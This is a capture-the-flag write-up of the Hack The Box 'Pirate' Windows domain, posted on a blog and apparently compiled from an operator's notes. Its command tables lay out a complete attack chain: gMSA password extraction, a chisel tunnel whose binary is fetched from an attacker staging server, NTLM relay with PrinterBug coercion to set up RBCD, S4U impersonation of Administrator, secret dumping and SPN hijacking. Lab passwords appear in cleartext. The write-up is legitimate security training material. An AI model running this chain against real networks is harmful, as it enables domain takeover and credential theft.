Machine / Machines

Pirate

By Jennofrie Daguil · Cybersecurity and Red Team Operator

Phase A is complete per user-provided handoff. Raw Phase A command artifacts are not yet synced into this local folder, so notes currently distinguish the values as a handoff state. 1. Enumerate DC01 and confirm pirate.htb. 2. Validate starting credential...

HardPublished 2026-03-24Sanitized local writeup

Scenario

Pirate attack path

Phase A is complete per user-provided handoff. Raw Phase A command artifacts are not yet synced into this local folder, so notes currently distinguish the values as a handoff state. 1. Enumerate DC01 and confirm pirate.htb. 2. Validate starting credential...

Objective

Machine walkthrough focused on Machines evidence, validation, and reusable operator lessons.

Pirate sanitized attack graph

Walkthrough flow

01

pentest --smb/ldap- to DC01

02

MS01$ --gMSA-read- to gMSA_ADFS_prod$, gMSA_ADCS_prod$

03

gMSA_ADFS_prod$ --winrm- to DC01 (PowerShell only, no...

04

gMSA_ADFS_prod$ --winrm- to WEB01 (non-admin, Remote...

05

gMSA_ADCS_prod$ --winrm- to DC01 (PowerShell only, no...

Source coverage

High source coverage

Status: complete. This article is generated from 7 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

100% coverage
Evidence verdict

High confidence: the page is reconstructed from a primary walkthrough plus multiple supporting notes or evidence sources. Treat the chain as source-backed, while still checking the listed source files for sensitive values.

  • Pirate/walkthrough.md
  • HTB/Pirate/notes.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Pirate__attack-map.md.a3819a09ff.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Pirate__custom-exploit-notes.md.19cba7bdae.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Pirate__dead-ends.md.6275eeb8d0.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Pirate__notes.md.3b2da381f1.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Pirate__session-resume.md.34ff7bb4e5.md

Technical Walkthrough

Pirate Walkthrough

Current State

Phase A is complete per user-provided handoff. Raw Phase A command artifacts are not yet synced into this local folder, so notes currently distinguish the values as a handoff state.

Expected Path To Validate

  1. Enumerate DC01 and confirm pirate.htb.
  2. Validate starting credential pentest:p3nt3st2025!&.
  3. Handle Kerberos time skew.
  4. Enumerate AD and collect BloodHound data.
  5. Abuse Pre-Windows 2000 machine account behavior for MS01$.
  6. Use MS01$ to read gMSA <password redacted>.
  7. WinRM to DC01 as gMSA.
  8. Discover and pivot to internal WEB01. Current validated internal addresses: DC01 <TARGET>, WEB01 <TARGET>.
  9. Abuse NTLM relay/RBCD to get Administrator-equivalent access on WEB01.
  10. Capture user flag on WEB01.
  11. Dump a.white credential from WEB01.
  12. Use a.white / a.white_adm WriteSPN and constrained delegation path.
  13. Get SYSTEM on DC01 and capture root flag.

Phase B Pivot Plan

Preferred: Ligolo-ng, because Pirate requires several follow-on tools to reach WEB01 and a route-style pivot is easier to reason about than SOCKS-only state.

  1. Start Ligolo proxy on Pwnbox in a persistent tmux pane.
  2. Upload Ligolo agent to DC01 using the gMSA WinRM foothold.
  3. Start the agent from DC01 back to Pwnbox.
  4. Add a route for <TARGET>/24 through the Ligolo interface.
  5. Validate from Pwnbox:

- ping may not work; do not depend on it.

- Use TCP checks against WEB01.

- Confirm 445/tcp and then broader Windows service ports.

  1. Save all route, listener, and scan output under enum/ and nmap/.

Success criteria for Phase B:

  • A persistent tunnel is running.
  • Pwnbox tools can reach <TARGET>:445.
  • WEB01 hostname/IP mapping is recorded.
  • WEB01 SMB signing state is checked and saved.
  • The team is ready to run ntlmrelayx and coercion in separate persistent panes for Phase C.

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

  • Target: Pirate
  • Difficulty: Hard
  • OS: Windows
  • Created / released: 2026-02-28
  • Current known IP: Pending in local notes; user-reported Phase A live state confirms DC01 and internal WEB01.
  • Local support folder: <local workspace>

Evidence Rule

Public research in research.md is advisory only. Record only live target evidence in this file after validation.

Evidence Ledger

TimestampCommandOutput fileFindingConfidenceNext action
PendingPendingPendingPublic research handoff created. Live target IP not yet recorded here.HighAdd target IP, validate provided credentials, run AD enumeration, and save outputs under nmap/ and enum/.
2026-05-06 AESTUser-provided Phase A handoffNot yet synced locallyDomain pirate.htb / DC01.pirate.htb confirmed on Server 2019. Starting credential pentest:p3nt3st2025!& validated. MS01$ reset/validated with <password redacted> and can read gMSA managed <password redacted>. gMSA_ADFS_prod$ NTLM <hash redacted> has WinRM on DC01. gMSA_ADCS_prod$ NTLM <hash redacted> has WinRM on DC01. Internal network discovered: DC01 <TARGET>, WEB01 <TARGET>, WEB01 445/tcp confirmed. IT group has WriteSPN on computer objects. WinRM on DC01 requires PowerShell mode, so use nxc winrm -X, not -x.Medium until raw artifacts are synced; high if supported by other agent logsPhase B: establish persistent pivot to <TARGET>/24, verify WEB01 services through tunnel, then prepare RBCD/relay phase.

Validated Phase A State

AssetValue
Domainpirate.htb
DCDC01.pirate.htb, Windows Server 2019
Starting userpentest
Starting passwordp3nt3st2025!&
Pre2K machine accountMS01$
Current MS01$ password<password redacted>
gMSA foothold 1gMSA_ADFS_prod$, NTLM <hash redacted>, WinRM on DC01
gMSA foothold 2gMSA_ADCS_prod$, NTLM <hash redacted>, WinRM on DC01
Internal DC IP<TARGET>
Internal WEB01 IP<TARGET>
Confirmed internal serviceWEB01 445/tcp
Important WinRM noteUse nxc winrm -X for PowerShell commands; -x CMD mode is not suitable on DC01

Phase B Objective

Establish a reliable pivot from Pwnbox through DC01 to <TARGET>/24, then validate WEB01 SMB/RPC reachability from Pwnbox tooling.

Attack Map

Hosts

IPHostnameOSStatusReachable From
<TARGET>DC01.pirate.htbWindows Server 2019 Build 17763 (DC)PWNED (Domain Admin via S4U)Pwnbox (direct)
<TARGET>DC01 internalWindows Server 2019Same host-
<TARGET>WEB01.pirate.htbWindows Server 2019PWNED (Admin via S4U)DC01 pivot (chisel SOCKS)

Services

HostPortServiceVersionAuthNotes
DC01445SMBServer 2019pentest:p3nt3st2025!&Signing: True
DC015985WinRM-gMSA_ADFS_prod$:hashPwn3d!
DC0188Kerberos--No skew
DC01389/636LDAP/S-pentest, MS01$gMSA read via MS01$
WEB0180HTTPIIS 10.0-Default IIS page
WEB01135MSRPC---
WEB01139NetBIOS---
WEB01443HTTPSIIS 10.0-HTTPS enabled
WEB01445SMBSMB 3.1.1gMSA_ADFS_prod$:hashSigning REQUIRED
WEB015985WinRM<secret redacted>/2.0-Active, needs auth

Credentials

SourceUsernameSecretTypeTested OnResult
Providedpentestp3nt3st2025!&PasswordSMB, LDAPVALID
Pre2K changedMS01$<password redacted>PasswordSMB, LDAPVALID (Domain Secure Servers member)
Pre2K changedEXCH01$<password redacted>PasswordSMBVALID
gMSA dumpgMSA_ADFS_prod$<<secret redacted>>NT HashWinRM DC01Pwn3d!
gMSA dumpgMSA_ADCS_prod$<<secret redacted>>NT HashWinRM DC01Pwn3d!
RBCD relayLVVFWLGX$w1axqm4eEeJ+RPasswordS4U to WEB01RBCD delegation to WEB01$
WEB01 LSAa.whiteE2nvAOKSz5Xz2MJuPasswordSMB DC01VALID (no WinRM on DC01)
WEB01 SAMAdministrator (local)<<secret redacted>>NT HashWEB01 localLocal admin
WEB01 LSAWEB01$<<secret redacted>>NT Hash-Machine account hash

Attack Paths

#PathStatusEvidence
1pentest -> Pre2K MS01$ (<password redacted>) -> gMSA dump -> DC01 WinRM<secret redacted>Phase A complete
2DC01 pivot -> WEB01 PrinterBug -> RBCD relay to LDAPS -> S4U as Admin -> WEB01 PWNED -> user flag<secret redacted>user.txt: <REDACTED>
3a.white (from WEB01 LSA) -> reset a.white_adm -> WriteSPN (move HTTP/WEB01 to DC01$) -> S4U2Proxy+altservice -> CIFS/DC01.pirate.htb as Administrator -> root flag<secret redacted>root.txt: <REDACTED>

Trust Edges (Confirmed)

text
pentest --smb/ldap--> DC01
MS01$ --gMSA-read--> gMSA_ADFS_prod$, gMSA_ADCS_prod$
gMSA_ADFS_prod$ --winrm--> DC01 (PowerShell only, no cmd)
gMSA_ADFS_prod$ --winrm--> WEB01 (non-admin, Remote Management Users)
gMSA_ADCS_prod$ --winrm--> DC01 (PowerShell only, no cmd)
DC01 [<TARGET>] --switch01--> WEB01 [<TARGET>]
WEB01 [<TARGET>] --direct--> Pwnbox [<TARGET>] (confirmed ports 445, 8000, 8081)
LVVFWLGX$ --RBCD/S4U--> Administrator@WEB01 (cifs/WEB01.pirate.htb)
a.white --smb--> DC01 (valid, no WinRM)
IT group (a.white_adm) --WriteSPN--> DC01$, MS01$, EXCH01$, WEB01$

BloodHound Key Data

  • 4 computers: DC01, WEB01, MS01, EXCH01
  • 10 users, 54 groups
  • DC01: Unconstrained Delegation
  • WEB01: Constrained delegation (HTTP/WEB01, WSMAN/WEB01, HOST/WEB01.pirate.htb)
  • Domain Secure Servers: MS01$ (gMSA read privilege)
  • IT group: a.white_adm (WriteSPN on all computer objects)

Notes

NTLM Relay Configuration

  • Target: ldaps://<TARGET>
  • Flags: --delegate-access --remove-mic -smb2support
  • Coercion: coercer against WEB01 using gMSA creds

S4U Ticket Parameters

  • First S4U: cifs/WEB01.pirate.htb impersonate Administrator
  • Root S4U: HTTP/WEB01.pirate.htb with -altservice CIFS/DC01.pirate.htb

SPN Changes

  • Remove HTTP/WEB01 from WEB01$ (if present)
  • Add HTTP/WEB01 to DC01$ (or as needed per live BloodHound)

Dead Ends

VPN Mismatch - Starting Point vs Labs

  • Hypothesis: Target at <TARGET> should be reachable from Pwnbox
  • Tested: nmap -Pn -sT multiple ports, traceroute, direct TCP connect on 445
  • Why it failed: Pwnbox is on Starting Point VPN (edge-us-starting-point-vip-1-dhcp), Pirate is on Labs network
  • Tried: Changed VPN endpoint to edge-us-free-1.hackthebox.eu - VPN auth failed (certs tied to SP)
  • Revisit if: User spawns Pirate and provides Labs VPN config, or respawns Pwnbox with Labs VPN

Notes

Target: <TARGET> (DC01.pirate.htb)

Domain: pirate.htb

Difficulty: Hard

Started: 2026-05-05

Phase A Completed: 2026-05-06 06:31 UTC

Attacker IP: <TARGET>

Pwnbox: <TARGET> (<<secret redacted>>)

Workspace (Pwnbox): /home/<<secret redacted>>/pirate/

Phase A Evidence Ledger

Timestamp (UTC)CommandOutput FileFindingNext
06:24nmap --script smb2-time -p<redacted>inlineSkew <1sNo sync needed
06:25nxc smb -u pentest -p 'p3nt3st2025!&'inlinepirate.htb\pentest VALID, DC01, Server 2019Enumerate
06:25nxc smb --sharesenum/smb-shares.txtIPC$(R), NETLOGON(R), SYSVOL(R)No custom shares
06:25nxc ldap --usersenum/ldap-users.txt7 users: Admin, Guest, krbtgt, a.white_adm, a.white, pentest, j.sparrow
06:25nxc ldap --groupsenum/ldap-groups.txtIT, Domain Secure Servers, Hyper-V Admins notable
06:25bloodhound-python -c allenum/20260506012515_*.json4 computers, 10 users, 54 groups, 0 trustsAnalyze
06:26nxc smb MS01$:ms01inline<secret redacted>Pass already changed
06:26nxc smb EXCH01$:exch01inline<secret redacted> (pass valid!)changepasswd
06: <REDACTED>
06: <REDACTED>
06:28nxc ldap EXCH01$ --gmsaenum/gmsa-exch01.txtNTLM empty - no read permsNeed MS01$
06: <REDACTED>
06:29nxc ldap MS01$ --gmsaenum/gmsa-ms01.txtgMSA_ADCS: 2b8849...67089, gMSA_ADFS: 76754c...28eeTest WinRM
06:30nxc winrm gMSA_ADFS_prod$ -H hashinlinePwn3d!
06:30nxc winrm gMSA_ADCS_prod$ -H hashinlinePwn3d!
06:30nxc winrm -X ipconfiginlineDC01: <TARGET> + <TARGET>/24 (vEthernet Switch01)
06:31nxc winrm -X Test-NetConnection <TARGET> :445inlineTrueWEB01 reachable

Credentials Collected

text
pentest : p3nt3st2025!&                              [SMB, LDAP]
MS01$   : <REDACTED>, LDAP - Domain Secure Servers]
EXCH01$ : <REDACTED>, Kerberos]
gMSA_ADFS_prod$ NTLM: <<secret redacted>>  [WinRM DC01]
gMSA_ADCS_prod$ NTLM: <<secret redacted>>  [WinRM DC01]

Network Map

text
[Pwnbox <TARGET>] ──VPN──> [DC01 <TARGET>]
                                    │
                               [<TARGET>/24]
                                    │ (Hyper-V vEthernet Switch01)
                                    │
                               [<TARGET> WEB01]

Tools & Versions Used

  • nmap 7.94SVN
  • nxc (netexec) latest
  • bloodhound-python (legacy 4.2/4.3 format)
  • impacket 0.14.0.dev0+20260505
  • bloodyAD 2.5.4

Key Notes

  • gMSA WinRM shell is PowerShell only (cmd fails with "no Invoke rights")
  • Use -X flag for PowerShell, not -x for cmd
  • MS01$ password was already changed by another player to <password redacted> (min password age blocks re-change)
  • EXCH01$ was in <secret redacted> state - changed via changepasswd.py rpc-samr
  • Only MS01$ can read gMSA <password redacted> (member of "Domain Secure Servers")

Phase B Evidence Ledger (Pivot to WEB01)

Timestamp (UTC)CommandOutput FileFindingNext
06:54chisel server -p 8081 --reversetmux pirate:0Listening on <TARGET>:8081, reverse tunnelling enabledUpload chisel to DC01
06:54python3 -m http.server 8000 (staging /tmp)tmux pirate:1HTTP file server on port 8000 for binary stagingDownload from DC01
06:54:32evil-winrm: Invoke-WebRequest http://<TARGET>:8000/chisel_windows_amd64.exestaging HTTP logchisel_windows_amd64.exe downloaded to DC01 (200 OK)Start client
06:55:31evil-winrm: C:\Windows\Temp\chisel.exe client <TARGET>:8081 R:sockstmux pirate:2session#1: tun: proxy#R:<TARGET>:1080=>socks: Listening (version mismatch 1.10.1 vs 1.10.0, non-blocking)Verify SOCKS
06:58:22(chisel reconnect — session#3 final stable)tmux pirate:0session#3 connected, SOCKS on <TARGET>:1080 stableConfigure proxychains
06:58/etc/proxychains4.conf: socks5 <TARGET> 1080/etc/proxychains4.confproxychains4 configured for chisel SOCKSTest reachability
06:59nxc winrm -X 'Test-NetConnection <TARGET> -Port 445'/tmp/dc01-web01-test.txtTcpTestSucceeded=True, RemotePort=445Port scan WEB01
07:01proxychains4 nc -w3 <TARGET> (ports 21-5985)/tmp/web01-portscan.txtOPEN: 80, 135, 139, 443, 445, 5985; CLOSED: 21, 22, 53, 88, 389, 3389SMB signing check
07:03proxychains4 nmap -Pn -sT --script smb2-security-mode -p<redacted> <TARGET>/tmp/web01-smb-signing.txtPort shows "filtered" (nmap SOCKS limitation)Use nc/script method
07:11proxychains4 nmap -Pn -sT -p 445,5985,135,80,3389 <TARGET>/tmp/web01-scan.txtAll ports show "filtered" (nmap+proxychains false negative)Test with nxc/smbclient
07:13proxychains4 nxc smb <TARGET> (script capture)/tmp/web01-script.txtWEB01 reached via nxc but output capture issueConfirm signing
07:15nxc smb WEB01 via chisel port-forward (<TARGET>:8445)attack-map.mdSMB Signing: REQUIRED on WEB01:445 (confirmed in attack-map)Relay must target LDAPS on DC01, not WEB01 SMB
07:15proxychains4 evil-winrm -i <TARGET> -u gMSA_ADFS_prod$ -H hashtmux pirate:5WinRM access to WEB01 as gMSA_ADFS_prod$ (non-admin, Remote Management Users)Confirm WEB01 can reach Pwnbox
07:15evil-winrm WEB01: Get-Service Spoolertmux pirate:5Spooler service RUNNING on WEB01PrinterBug viable
07:15evil-winrm WEB01: ls \\\\<TARGET>\\testtmux pirate:5"Cannot find path" (confirms WEB01 has outbound SMB to Pwnbox)RBCD relay path confirmed

Phase C Evidence Ledger (RBCD Relay + User Flag)

Timestamp (UTC)CommandOutput FileFindingNext
07:20sudo ntlmrelayx -t ldaps://<TARGET> --delegate-access --remove-mic -smb2support --no-http-server --no-wcf-server --no-raw-server (1st attempt)tmux pirate:4Received connection from <TARGET>, SUCCEED but IndexError (list index out of range in validatePrivileges) — anonymous/empty identity relayedRetry with proper coercion target
07:34sudo ntlmrelayx -t ldaps://<TARGET> --delegate-access --remove-mic -smb2support --no-http-server --no-wcf-server --no-raw-server (2nd attempt)tmux pirate:4Server started on port 445, waiting for connectionsTrigger coercion
07:36proxychains4 coercer coerce -l <TARGET> -t <TARGET> -d pirate.htb -u gMSA_ADFS_prod$ --hashes :hash --always-continue/tmp/coerce-output.txtcoercer timed out via proxychains (SOCKS issue with impacket)Use PySocks script
07:36proxychains4 coercer --filter-method-name EfsRpcOpenFileRaw (2nd attempt)/tmp/coerce2.txtAlso timed out — proxychains+coercer unreliableWrite custom PySocks PrinterBug
07:43python3 /tmp/printerbug_socks.py/tmp/printerbug_socks.pyConnected to spoolss pipe, bound MS-RPRN, triggered RpcRemoteFindFirstPrinterChangeNotificationEx -> <TARGET>Check relay
07:43ntlmrelayx received authtmux pirate:4Authenticating against ldaps://<TARGET> as PIRATE/WEB01$ SUCCEEDRBCD created
07:43ntlmrelayx RBCD resulttmux pirate:4Adding new computer: LVVFWLGX$ / w1axqm4eEeJ+R result: OK. Delegation rights modified successfully! LVVFWLGX$ can now impersonate users on WEB01$ via S4U2ProxyGet service ticket
07:45impacket-getST -spn cifs/WEB01.pirate.htb -impersonate Administrator pirate.htb/LVVFWLGX$:'w1axqm4eEeJ+R'/home/<<secret redacted>>/Administrator.ccacheTicket saved: Administrator@cifs/WEB01.pirate.htb (S4U2Self + S4U2Proxy)Access WEB01
07: <REDACTED>
07:47python3 /tmp/secretsdump_socks.py (SAM + LSA dump)/home/<<secret redacted>>/pirate/loot/sam_hashes.txt.samSAM: Administrator:<<secret redacted>>, Guest/Default emptyCheck LSA
07:48python3 /tmp/secretsdump2.py (LSA secrets)inlineLSA cached domain logon: a.white : E2nvAOKSz5Xz2MJu (plaintext from DPAPI/LSA)Validate on DC01
07: <REDACTED>, no WinRM on DC01)Phase D: <REDACTED>

Phase D Evidence Ledger (Root Flag)

Timestamp (UTC)CommandFindingNext
08: <REDACTED>
08:01nxc smb a.white_adm:<password redacted>![+] pirate.htb\a.white_adm VALIDCheck delegation
08:01bloodyAD get object a.white_adm --attr msDS-AllowedToDelegateTohttp/WEB01.pirate.htb; HTTP/WEB01Confirm UAC
08:01bloodyAD get object a.white_adm --attr userAccountControl<secret redacted> setSPN manip
08:01bloodyAD get object WEB01$ --attr servicePrincipalNameHTTP/WEB01 and HTTP/WEB01.pirate.htb presentSnapshot
08:01bloodyAD get object DC01$ --attr servicePrincipalNameNo HTTP/WEB01 presentReady for injection
08:02addspn.py -t WEB01$ -s HTTP/WEB01 -r (remove)SPN Modified successfullyAdd to DC01$
08:02addspn.py -t DC01$ -s HTTP/WEB01 (add)SPN Modified successfullyGet ticket
08:02ntpdate <TARGET>+0.016s offsetTime synced
08:02getST.py -spn HTTP/WEB01 -impersonate Administrator -altservice CIFS/DC01.pirate.htbTicket saved: Administrator@<email redacted>Access DC01
08: <REDACTED>
08:02impacket-wmiexec -k -no-pass DC01.pirate.htb 'whoami'pirate\administratorConfirmed DA
08:03addspn.py -t DC01$ -s HTTP/WEB01 -r (remove)RestoredCleanup
08:03addspn.py -t WEB01$ -s HTTP/WEB01 (add)RestoredDone

Final Results

  • User flag: <REDACTED>, C: <REDACTED>
  • Root flag: <REDACTED>, C: <REDACTED>
  • Engagement: COMPLETE

Session Resume

Last updated: 2026-05-05 (<secret redacted> COMPLETE - All flags captured)

Current Access

  • DC01 (<TARGET>): WinRM as gMSA_ADFS_prod$ (non-admin on DC01)
  • WEB01 (<TARGET>): Administrator via S4U Kerberos ticket (LVVFWLGX$ RBCD)
  • a.white credentials confirmed: E2nvAOKSz5Xz2MJu (SMB on DC01, no WinRM)

Network Status

  • Pwnbox: <TARGET> (VPN IP: <TARGET>)
  • Chisel tunnel: ACTIVE (Pwnbox:8081 server, DC01 client, SOCKS on <TARGET>:1080)
  • WEB01 reachable via SOCKS proxy (proxychains or PySocks)
  • ntlmrelayx was used and target consumed (relay completed)

Active Sessions / Tunnels

  • tmux session: pirate with windows: main, staging, chisel, recon, relay, coerce
  • Chisel SOCKS proxy on Pwnbox port 1080
  • Kerberos ticket: /home/<<secret redacted>>/Administrator.ccache (cifs/WEB01.pirate.htb, valid ~10hrs)

Flags

  • User flag: <REDACTED>
  • Root flag: <REDACTED>

Phase C Results

  • Created machine account: LVVFWLGX$ / w1axqm4eEeJ+R via RBCD relay
  • PrinterBug triggered from WEB01 to Pwnbox (custom PySocks script)
  • S4U ticket obtained for Administrator@cifs/WEB01.pirate.htb
  • Secrets dumped from WEB01: <REDACTED>

Key Credentials for Phase D

  • `a.white : <REDACTED>, needed for password reset of a.white_adm)
  • a.white_adm (member of IT group, has WriteSPN on all computer objects)
  • WEB01$ has constrained delegation: HTTP/WEB01, WSMAN/WEB01, HOST/WEB01.pirate.htb

Phase D Execution Summary

  1. Reset a.white_adm password via bloodyAD (a.white -> a.white_adm)
  2. Removed HTTP/WEB01 SPN from WEB01$, added to DC01$ (via addspn.py from krbrelayx)
  3. Used getST.py with S4U2Self+S4U2Proxy and -altservice to get CIFS/DC01.pirate.htb ticket as Administrator
  4. wmiexec as pirate\administrator on DC01 -> root.txt captured
  5. SPNs restored to original state (cleanup)

Status

  • <secret redacted> COMPLETE. All objectives achieved.
  • Both flags submitted.

Technical Notes

  • impacket through proxychains times out on SMB (known SOCKS5 issue)
  • PySocks monkeypatch (socket.socket = socks.socksocket) works perfectly with impacket
  • Script at /tmp/printerbug_socks.py (PrinterBug via PySocks)
  • Script at /tmp/get_flag.py and /tmp/secretsdump2.py (SMB access via PySocks)
  • smbclient (Samba) works through proxychains; impacket does not

Cleanup Notes

  • krb5.conf on Pwnbox modified to <secret redacted> realm
  • /etc/hosts on Pwnbox: DC01.pirate.htb, WEB01.pirate.htb, MS01.pirate.htb entries added
  • Machine account LVVFWLGX$ created in domain (CN=Computers,DC=pirate,DC=htb)
  • RBCD delegation set on WEB01$ msDS-AllowedToActOnBehalfOfOtherIdentity

Related insights

MachinesArchetype Walkthrough - HTB Starting PointMachinesBaseMachinesBase